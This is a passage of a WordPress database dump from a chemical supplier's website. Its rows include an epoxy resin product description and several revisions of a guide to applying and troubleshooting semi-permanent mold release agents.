width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center">3.82</p>\n</td>\n<td valign="top" width="80">\n<p align="center">3.72</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">&nbsp;</td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n</tr>\n</tbody>\n</table>\n<sup>1</sup> Percent weight gain after 24 hours immersion at 25 °C.\n\n<sup>2</sup> Determined at 1 megacycle', 'EPON™ 815C', 'EPON Resin 815C is a low viscosity liquid bisphenol A based epoxy resin containing a commercial grade\nof n-butyl glycidyl ether. EPON Resin 815C is functionally equivalent to EPON Resin 815, and is suitable as\na replacement for EPON Resin 815 in most applications. Benefits include:\n<ul>\n 	<li>Low viscosity, allows for easy pumping and wetting of pigments and fillers</li>\n 	<li>100% reactive. Reacts with a full range of curing agents</li>\n 	<li>Provides minimal reduction of performance properties</li>\n</ul>', 'inherit', 'closed', 'closed', '', '910-autosave-v1', '', '', '2016-10-25 23:46:01', '2016-10-25 23:46:01', '', 910, 'https://www.miller-stephenson.com/910-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2757, 0, '2016-10-26 11:11:52', '2016-10-26 11:11:52', '', '', '', 'publish', 'closed', 'closed', '', '2757', '', '', '2016-10-26 11:11:52', '2016-10-26 11:11:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/2757/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2758, 3, '2016-10-26 12:04:22', '2016-10-26 12:04:22', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cured ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-26 12:04:22', '2016-10-26 12:04:22', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2759, 3, '2016-10-26 12:44:22', '2016-10-26 12:44:22', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cured ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-26 12:44:22', '2016-10-26 12:44:22', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2760, 3, '2016-10-26 12:45:41', '2016-10-26 12:45:41', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cured ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small 